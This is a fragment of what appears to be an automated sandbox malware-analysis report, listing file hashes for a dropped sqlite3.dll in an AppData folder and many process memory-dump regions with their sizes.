                            92dc6ef532fbb4a5c3201469a5b5eb63

                            SHA1

                            3e89ff837147c16b4e41c30d6c796374e0b8e62c

                            SHA256

                            9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

                            SHA512

                            9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

                          • \Users\Admin\AppData\Local\VideoJet 4.1.3.33\sqlite3.dll

                            Filesize

                            630KB

                            MD5

                            e477a96c8f2b18d6b5c27bde49c990bf

                            SHA1

                            e980c9bf41330d1e5bd04556db4646a0210f7409

                            SHA256

                            16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660

                            SHA512

                            335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

                          • memory/296-193-0x0000000000C60000-0x0000000000EC1000-memory.dmp

                            Filesize

                            2.4MB

                          • memory/296-338-0x0000000000C60000-0x0000000000EC1000-memory.dmp

                            Filesize

                            2.4MB

                          • memory/296-232-0x0000000061E00000-0x0000000061EF3000-memory.dmp

                            Filesize

                            972KB

                          • memory/1040-3-0x00000000008C0000-0x0000000000BD5000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/1040-14-0x0000000006880000-0x0000000006B95000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/1040-1-0x0000000077AD0000-0x0000000077AD2000-memory.dmp

                            Filesize

                            8KB

                          • memory/1040-0-0x00000000008C0000-0x0000000000BD5000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/1040-18-0x00000000008C1000-0x0000000000929000-memory.dmp

                            Filesize

                            416KB

                          • memory/1040-4-0x00000000008C0000-0x0000000000BD5000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/1040-16-0x00000000008C0000-0x0000000000BD5000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/1040-2-0x00000000008C1000-0x0000000000929000-memory.dmp

                            Filesize

                            416KB

                          • memory/1464-390-0x0000000000D00000-0x000000000135B000-memory.dmp

                            Filesize

                            6.4MB

                          • memory/1504-346-0x0000000000E40000-0x000000000113B000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/1504-230-0x0000000000E40000-0x000000000113B000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/1504-348-0x0000000000E40000-0x000000000113B000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/1504-461-0x0000000000E40000-0x000000000113B000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/1512-134-0x0000000000400000-0x0000000000414000-memory.dmp

                            Filesize

                            80KB

                          • memory/1512-40-0x0000000000400000-0x0000000000414000-memory.dmp

                            Filesize

                            80KB

                          • memory/1916-520-0x0000000000400000-0x0000000000C67000-memory.dmp

                            Filesize

                            8.4MB

                          • memory/1916-1034-0x0000000000400000-0x0000000000C67000-memory.dmp

                            Filesize

                            8.4MB

                          • memory/1916-479-0x0000000010000000-0x000000001001C000-memory.dmp

                            Filesize

                            112KB

                          • memory/1916-512-0x0000000000400000-0x0000000000C67000-memory.dmp

                            Filesize

                            8.4MB

                          • memory/1916-381-0x0000000000400000-0x0000000000C67000-memory.dmp

                            Filesize

                            8.4MB

                          • memory/1996-171-0x0000000006CE0000-0x00000000071A4000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/1996-172-0x0000000000BB0000-0x0000000001074000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/1996-156-0x0000000000BB0000-0x0000000001074000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/2040-352-0x0000000000400000-0x00000000006FB000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/2040-490-0x0000000000400000-0x00000000006FB000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/2040-133-0x0000000000400000-0x00000000006FB000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/2040-566-0x0000000000400000-0x00000000006FB000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/2040-137-0x0000000000400000-0x00000000006FB000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/2040-138-0x0000000060900000-0x0000000060992000-memory.dmp

                            Filesize

                            584KB

                          • memory/2040-286-0x0000000000400000-0x00000000006FB000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/2040-104-0x0000000000400000-0x00000000006FB000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/2040-90-0x0000000000400000-0x00000000006FB000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/2220-482-0x0000000006D00000-0x000000000754D000-memory.dmp

                            Filesize

                            8.3MB

                          • memory/2220-231-0x0000000000F40000-0x0000000001404000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/2220-194-0x00000000066E0000-0x0000000006941000-memory.dmp

                            Filesize

                            2.4MB

                          • memory/2220-192-0x00000000066E0000-0x0000000006941000-memory.dmp

                            Filesize

                            2.4MB

                          • memory/2220-174-0x0000000000F40000-0x0000000001404000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/2220-300-0x0000000000F40000-0x0000000001404000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/2220-947-0x00000000066E0000-0x0000000006941000-memory.dmp

                            Filesize

                            2.4MB

                          • memory/2220-325-0x0000000006D00000-0x0000000006FFB000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/2220-347-0x0000000006D00000-0x0000000006FFB000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/2220-587-0x0000000000F40000-0x0000000001404000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/2220-568-0x0000000006D00000-0x000000000754D000-memory.dmp

                            Filesize

                            8.3MB

                          • memory/2220-519-0x0000000000F40000-0x0000000001404000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/2220-228-0x0000000006D00000-0x0000000006FFB000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/2220-229-0x0000000006D00000-0x0000000006FFB000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/2220-362-0x0000000000F40000-0x0000000001404000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/2224-556-0x0000000000880000-0x0000000000D22000-memory.dmp

                            Filesize

                            4.6MB

                          • memory/2428-562-0x0000000000330000-0x00000000009E9000-memory.dmp

                            Filesize

                            6.7MB

                          • memory/2808-521-0x0000000000240000-0x00000000008F9000-memory.dmp

                            Filesize

                            6.7MB

                          • memory/2812-561-0x0000000000A20000-0x00000000016D1000-memory.dmp

                            Filesize

                            12.7MB

                          • memory/2864-136-0x0000000000400000-0x00000000004BC000-memory.dmp

                            Filesize

                            752KB

                          • memory/2864-132-0x0000000005380000-0x000000000567B000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/2864-89-0x0000000005380000-0x000000000567B000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/2912-534-0x0000000000400000-0x0000000000C4D000-memory.dmp

                            Filesize

                            8.3MB

                          • memory/2912-486-0x0000000000400000-0x0000000000C4D000-memory.dmp

                            Filesize

                            8.3MB

                          • memory/2912-487-0x0000000000400000-0x0000000000C4D000-memory.dmp

                            Filesize

                            8.3MB

                          • memory/2912-485-0x0000000000400000-0x0000000000C4D000-memory.dmp

                            Filesize

                            8.3MB

                          • memory/2912-484-0x0000000000400000-0x0000000000C4D000-memory.dmp

                            Filesize

                            8.3MB

                          • memory/2980-569-0x0000000000880000-0x0000000000D22000-memory.dmp

                            Filesize

                            4.6MB

                          • memory/3048-285-0x0000000000B30000-0x0000000000E45000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/3048-489-0x0000000000B30000-0x0000000000E45000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/3048-157-0x00000000069A0000-0x0000000006E64000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/3048-563-0x0000000000B30000-0x0000000000E45000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/3048-135-0x0000000000B30000-0x0000000000E45000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/3048-17-0x0000000000B30000-0x0000000000E45000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/3048-371-0x0000000006710000-0x0000000006F77000-memory.dmp

                            Filesize

                            8.4MB

                          • memory/3048-211-0x00000000069A0000-0x0000000006E64000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/3048-511-0x0000000006710000-0x0000000006F77000-memory.dmp

                            Filesize

                            8.4MB

                          • memory/3048-19-0x0000000000B31000-0x0000000000B99000-memory.dmp

                            Filesize

                            416KB

                          • memory/3048-20-0x0000000000B30000-0x0000000000E45000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/3048-380-0x0000000006710000-0x0000000006F77000-memory.dmp

                            Filesize

                            8.4MB

                          • memory/3048-88-0x0000000000B30000-0x0000000000E45000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/3048-155-0x00000000069A0000-0x0000000006E64000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/3048-351-0x0000000000B30000-0x0000000000E45000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/3048-87-0x0000000000B31000-0x0000000000B99000-memory.dmp

                            Filesize

                            416KB

                          • memory/3048-84-0x0000000000B30000-0x0000000000E45000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/3048-26-0x0000000000B30000-0x0000000000E45000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/3048-25-0x0000000000B30000-0x0000000000E45000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/3048-23-0x0000000000B30000-0x0000000000E45000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/3048-24-0x0000000000B30000-0x0000000000E45000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/3048-21-0x0000000000B30000-0x0000000000E45000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/3200-748-0x0000000000B70000-0x0000000000E36000-memory.dmp

                            Filesize

                            2.8MB

                          • memory/3200-747-0x0000000000B70000-0x0000000000E36000-memory.dmp

                            Filesize

                            2.8MB

                          • memory/3620-795-0x00000000027E0000-0x00000000027E8000-memory.dmp

                            Filesize

                            32KB

                          • memory/3620-794-0x000000001B440000-0x000000001B722000-memory.dmp

                            Filesize

                            2.9MB